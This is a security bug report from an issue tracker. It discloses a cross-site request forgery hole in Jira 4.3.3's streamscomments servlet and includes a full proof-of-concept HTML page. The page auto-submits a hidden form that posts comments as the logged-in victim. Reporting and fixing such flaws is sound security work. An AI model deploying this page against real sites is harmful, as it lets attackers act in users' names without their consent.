Cross-Site Request Forgery

XMLWordPrintable

    • Type: Bug
    • Resolution: Duplicate
    • Priority: Highest
    • None
    • Affects Version/s: 4.3.3
    • Component/s: None
    • Environment:

      Standalone version. The JDK version is sun-java6-jre on a 6.24-1~squeeze1 (Debian).

    • 4.03

      Cross-Site Request Forgery

      Security auditing tests performed on a Jira Bug Issue and Project Tracking Software locally running instance shown that the application is succeptible to Cross-Site Request Forgery attacks within this URL:

      [/jira/plugins/servlet/streamscomments]

      This vulnerability enables for an attacker to post comments inside an issue through a session created by a valid user logged into the system. Comments are signed by the logged user and can be posted without it's consent.

      The first image outlined below describes where the attack has been performed, the second image describes an example of the code used to trigger the Cross-Site Request Forgery and the third image describes the result of the attack:

      Furthermore, an example of the complete source-code of the Cross-Site Request Forgery html file can be found below:

      <html>
<head>
<TITLE>..:: TEMPEST XSRF ::..</TITLE>
<body onload="document.formXSRF.submit()">

<center>
	.:: TEMPEST ::.
	<br>
	<br>
	<img src="data:image/jpge;base64,iVBORw0KGgoAAAANSUhEUgAAAMUAAABCCAIAAABo74XHAAAAA3NCSVQICAjb4U/gAAAAGXRFWHRTb2Z0d2FyZQBnbm9tZS1zY3JlZW5zaG907wO/PgAAECFJREFUeJztnH9wE2d6x18TO0jeVYyYQWu5N2VYXXHrRGKK+MOCS+qe5Vx6sbG5upc5YXJHJshp5pKZs/nlNkzMhWuSIwLa5g4sM7n0sJW7lgv2CXoBSY1bhohpT56iLb7Kc1qmvyRWzcTB2pWE7cT944G3y64ktNLaIdx+hmFW7777vu/uft/nfd7nfddVmUwGaWioxIrPugEa9xWanjTURNOThppoetJQE01PGmqi6UlDTTQ9aaiJpicNNdH0pKEm1SqWFYsneCFHrzWRtSsfeOCBFSuUiTUWT0SYa2k+W2L+RkuD3brOQOqVt1RjqaiqcL0lFk94R0Ogg0ZLA0novv1Np2WtaWFhYWFhASFUU1NTW1tbXX0X4ab5bMfOw6WLCehosw/2dZffeg21Kd8+JbmZl4+cjkRZhFB/b7ura4skQyaTyWQyc3Nzc3NzNTU1Dz30UFVVVaHSDKSeJHRK9WQ2rSqj5Rp5SfNZf3CygTK2OJrKLqRMPfkDkcEjp/HPDudGeR6wT8D8/Pzs7GxxSZ19e688cWgk6B0NIYQiv3i1vKZqlMhEeMozdNZuoyvRUzn+eCyeEIsJIeQbuyT+ubi4eOPGjbm5OXHi/Py8IAjz8/Nl1KixDCS4mcoLUaynWDzh8Z6TJHpHQ56hs3A8Pz//0UcfyXWj0+lIkrx582YulyuvrRr3Psr0lOazHu85z4Ee+azKN3ap/Vvfv/CP/3rjxo3FxUXJ2erqapIkEUIrV67keV5iujTuG5T5T/2vjMAUfbCvu/+7pyRnk9zMwGs/bXv04W1f2WhZa8Lp4IzD8SeffIIQSqfTq1evLuJLKWUiPOUPRNLCHZavkTa3OJrsNlqeP8nN/DwQ2WSj4Wwkyg6NhiR5WhxN8kmGPxBJcDMR5hr8NBC6FkdTR5u9eKsaKKN46gA+b4mRjiQ388so6w9OihMNhM5uozucGwsVgoMvvJCLsUnJ2Uba3O7c2GhpELcTsk2zSfe+YZzTbl3X4mjCOe+KAj35A5FIlG2gjAihFkfTYF+3x3tOPiMLXLwauHi16ysbd2xzkIROr9cTBAGnFhcXBUGAg1wup9erEDpK89n+V0ZgmikhEmX9wcl+95Py9/1+eMo7Gppmk3YbPRGeGjxyWn4jkSib5Gb6e9vh50R46o2hs0mZkzERnvIHJ+U2O8nN4C4XyddyM2X0HOgp/qoiUfblI6fllUK9E+GpvPXu2jec9xJxsWkhB6GWWDwhNg1pPit+mHC8JHqaCE/B/0luxkwZO9rsv7Ou/sDhn7L/+b/yzGPnJwMXr7pdX+7548cgZWFhged5PBTOzc1VrqdYPHHw6M9i8YSZMrq6tjTSZnwqLeSg2w0eOT3NJrEsbp3ls5AH5o8GUu/q2kISOpxhmk1OhKdgntHf2w7lyLMlUx9DN/N4z0kiYdi97Wizm02rsEnjhVwsnkAIJbkZ17f/Om+oBcCT6I42e4ujySCqN8YmfWOXIlG2Y+fhodeexe87zWdBTAZSv542GwjdetEzEYMncY2WBvf2VoRQhLkWibJmyiiZrSua7inQEzwRsAeeAz11hpVrjLrj33v6wj/928iZMPfhrCS/kLl59OQvfuK/7DnQs/a3VguCIPerKsTjPReLJwyk/p03X5Bb/hZHk9m0yjsa8o1dWk+b5VYqEmUjURZsreTyNJ/t3X8yFk/4xi6RhM47GiqUbZpNxuIJfyDS4dyYd2zNm+4buwQzGM/Q2Wk2KY/KRqIsiMm9vbW3xyk5C4MdRIAPHv3Z0GvPQsP8wUmwTJ4DPXkbkxcof2gkCOOPvLrSUeCP4xEhFk889fxfjr33z6CPxx975IeHdvRsc+S9Cnrh4RN+yYCycuXKctt8C+igCCH8NOX09jihe+UdmoHdve3yyw2kHhcLAbC7ZpO4OMVxdW05+/ZeeOWSYB7Q/8oIQqjF0VTo7ULVCCEQPSTieyxdTOqiQE9iuydkbnqGzx8feZ8XcgghktB9s/tL7w5/p5BnOnZ+8vmXTl351X/BT51Op9Pp8uYsHXiI7u2txUd36PppPgvjtQRX1xYzZcx7IQwZcNziaCqSzW5dhxD6ZT4frghmyuh9fReWlNhr8QciaT4L854iJTRaGmCsxFLGipcLdHlQoCf39lZJBwWVMLH/IUly9erVa79gGuzrPvv23ryq4j6c3fsXf3vq3Q9IkoTYQSWAs4wQ2lpAwRgDqQfB5dVTe77IPqZRpKci2UATxV3gQmCHWjzBBH2UMgfEVYMc//D2Jf5ApOVPvuveN+wZOguGXOlaVnko8J/o317z+v7uN7zviR1w7sPZ3Yd+0tFm793eCj3YWKd/8Vtf7v6j3x85Ew5cvCopZORM+F+i/1FkhCoRbAx+Hsg7ebqD2dvet/xUcduGXe+GAsbpViEFfN5SMJD6b3Ru9o6GIlE2Fk9Ae0AcCW5maCRY/PJk6mM4iLFJu402U8ah1559Z/wDsHDgIIrrgvl/oWGkchToKZPJWNaaDv/Z19/wvheejItP+QMRfyDS0WZ/qn3TmtUkQqh+Td1u9xM92xwe73vRf/9vceZYPNG7/2SFksLTJa8sblQ6pTsZS+qOuLq2wF1MhKcaLQ1YARI1FAebn0ZLw2Bfd7/7yQhzDaJQuBAY9CfCU0OjoYN93UtxUwr0BEsoJKEb/E5X6NKvjo+8LzGhoCpxPLN+Td3hP39KnhlcyErmEYDYxbkr4OXcgxhIvZkyJrmZ6TsDj2bKWNwuipGMyAZS3+JowokgrGk2CbPRJDfj3jfse/OF0gNLJaJAT1VVVTChq66u/vrWL321dVPeQCLEM9seffi57S0koSMI4qnORx9rfgRvbgGwgamE9bTZ+/quysv5zGmgjEluRjIidzg3Vt7lgEZLA5ZOLJ7of2Ukyc307j/p/9EedTckKvDHIfy4YsWKurq6qqoqA6n/q4M7ntveQtTmmfkHLl59uu/k3/395MInCN2ey6g4bENwj8/nEn3eEcdLl4JGS8Pu3nZUeM5bCQr0BDP8Bx98ENbdeJ7neX7bE/YfH3m27dGH5fmFzM2T77zfu/8kHun63U/iXlIoKFwiMMxBoPk+ADoGdBL8iKZl625qgcdBVfaoiFGgpxUrVtTW1oKYMpkM3nZCErrd7id+eGiH7Xe/IL8qFk907DwML95A6vvdTyKExEN7eeDLVe9hy0+Sm4Hns/7O8IQqLsEyo2y/Sm1t7eLi4sLCgnzXuWWt6Qff2yleS8LgtQuEUFrI3TVMVwrYIahkfnePgEMeOJYGjsFSjEcADpWV7u+XiOL9dARByDfEgVNVW1u7aYPF9+YLcj8JVv3SfNYfiKjlA4Kpk28W/XwxEZ6CLgHRI0jE22wGj5xeijEdK3iT2iEDxXqqqqoiCEKydclgMNTU1OCfg33d8qVTXsgNHjktTy8bu42+tdoQiLj3DZceqrlHSPPZwSOn8V6R3u2t4rMH+7oNpB5M+9BIUMXotj8QAQVLFpHAVlUYSS/ne4Sqqqq6ujqe5/EXB/LPoTra7NNsUryv3L29tcj+r/Lo721PCzlY/HLf3qnzB82/J8+Jt84tP/7gpHxpD/bD4J+DsugiRLphNuMdDcGmGtgxISmqgTJuum3bYvHENJss5GXzQs4fnAS5mCmjxOvAtqpj5+FvdG4Wp5f+6Mr8vqW6unrVqlW5XC6TyXz66aezs7N6vb6mpibvlkszZVyiaCxCaLCvu8O5cWg0BPYpFk/kHSC8o6HBvu6lW2cogr/oipB4qUpCo6XB/6M9vrFL74x/kOaz4C3kLcRMGeHrIPFsuhAGUp+3b8MeMt/YJVAwTlf06Cr6Phi2CczPz9+8eTObzWazWYTQP4RjqQ9nEUIxNunq2lJox22JtDiaIsy14m6j3UZ7bXSSm4mxyUiUlW9vBcS+AhR71zlmKbVDA+w2ulA2+MxVnIK3uW1tsxfatnArJ6nv7XH29jjhvtJ8Npn6WG5+cOi/w7mx0O0jhBooo926bpPIUZPQ39tut9HyndOlu1mVfh+sUYhIlIWN2HhTym8C2t/D0FATTU8aaqLpSUNNND1pqImmJw010fS0VODwgeprZPcyWrxgCYlEWZLQqb4H8l5G05OGmige76IME2WYOPs5W3wtES6VWubyl7rGZUaBnp5+5plTPt/SNaV0LgSDktcQZ9nKJR5lmAvBu3yfJIZLpRTlRwjJ879x9Kgk5cz4uKIy7ykUrN+RJLnBarVZrYUycKkUx3EIIZqmydt/UwXgBYFl2escx6VSjzudlMkkvgr/FB/jFIIgGIZxNDfjxHqKkmQLhEKCIFgfeeRxp1N8bZGSSwSEC/clufcLwWCUYQRBaHM6xfcLN5v3OZSChc6/OAOP9wrDbOvslBQbZRiEECV7LLwgQOMFQZC/OPFL2dzcLKkXv80ib1yOAvv0/VdfvcIwp3y+Uz6f59gxaCsmzrLHvV44PnjokOTaoeHhE8PDCKENssaJu2ze7ntmfNx052O6wjDwBDGUyUSvW1dPUeLE414vbqTcDJTInv37wWCcGB6W3DJlMtVTlOVO0fCC8MbRo9c5DiotYziTDwJcKrVnYOBCMHid41KyAj3HjoFtPjM+Hr58WXyKZdm9AwPwrJ5+5hlJ+0d8PuiHG6xWyRfb8DbhjyvtGRgovfFK7BNB7HC54PhCMDji8z236/+/VQqEQmKBRxlGrOsr0eiP33qr9LrE4EqLAFVLetIGq5VlWZvVygsCodxO3CrEZoPb3OFyQWn4VD1FcamUpFKGYeopCpRdT1EXgsFS2l+cM+PjL7/0EqiWS6Uk8r3OcW2trQghet26d8fHxYYcIeRobt7W2YkQ2uxwSNofCAb/5q238lrQQCi0ubkZPzTJ2yxCmfGnx51Oib8SZ1lse3a4XPSdxnOzI/9fX1lSbFbrB5cvI4QYhvlaZ2d5hWDTWKIif82yeNDZ3NwsHn/LhjKZCo2bLMtiq1xPUeIeLkHe/iLDcVxUrPxtFqFMPUUZRjK4WGgaBmn4J2locX8Zn5Ib80qw0PR1juMF4XwwqMgJqIQv0jQYLfhXntMmgb1W8EMXmqbjLIurK+R75aWeogq9lOJvswgKxrsz4+MwAEPpvXd2hR6X6+ChQ1cYBvqBxOl+bteuUz4f3C1lMol77QarFU5VIiaCIE4MD9usVkm9X+vs3Dsw0LV1a9klF8FmtYJTKHZmHc3N746Pnxgehucg93PLwGQyPf/iizCQhS9fFg+gJEE4mpsHDx2CWr5I05Lxrgg9LtdxrxcuJAlim8iEw9v89W21yWcAhbgn4pkw0aAoCiEkn9/Ju7iiydqegYHDr5b6t/DzTjAhRdyXyqZI+UVSxJzy+STvvgjiNpc9w1XEPaGnpcNz7FjX1q2VW4jPEF4QzoyPw1xSEITzweCfut3LoIzyuM/1FGfZz7WYAHFwZNkcwfK4z/Wkscxo+1U01ETTk4aaaHrSUBNNTxpqoulJQ000PWmoiaYnDTXR9KShJv8H1UAXefXd7LkAAAAASUVORK5CYII=" />
</center>

<div style="display:none">
  <iframe name="framePost" > </iframe>
</div>

<form name="formXSRF" 
action="http://jiradomain/jira/plugins/servlet/streamscomments" 
method="post" target="framePost">
<input type='hidden' name='replyTo' value='http://jiradomain/jira/plugins/servlet/streamscomments/TEMPEST-8415'>
<input type='hidden' name='comment' value='Teste de CSRF por Ederson'>
</form>

</body>
</html>

        1. xx_resultadoCSRF.png
          xx_resultadoCSRF.png
          108 kB
        2. pontoCsrfJira.png
          pontoCsrfJira.png
          106 kB
        3. fontCode.png
          fontCode.png
          185 kB

              Assignee:
              Unassigned
              Reporter:
              João Paulo Lins
              Votes:
              0 Vote for this issue
              Watchers:
              0 Start watching this issue

                Created:
                Updated:
                Resolved: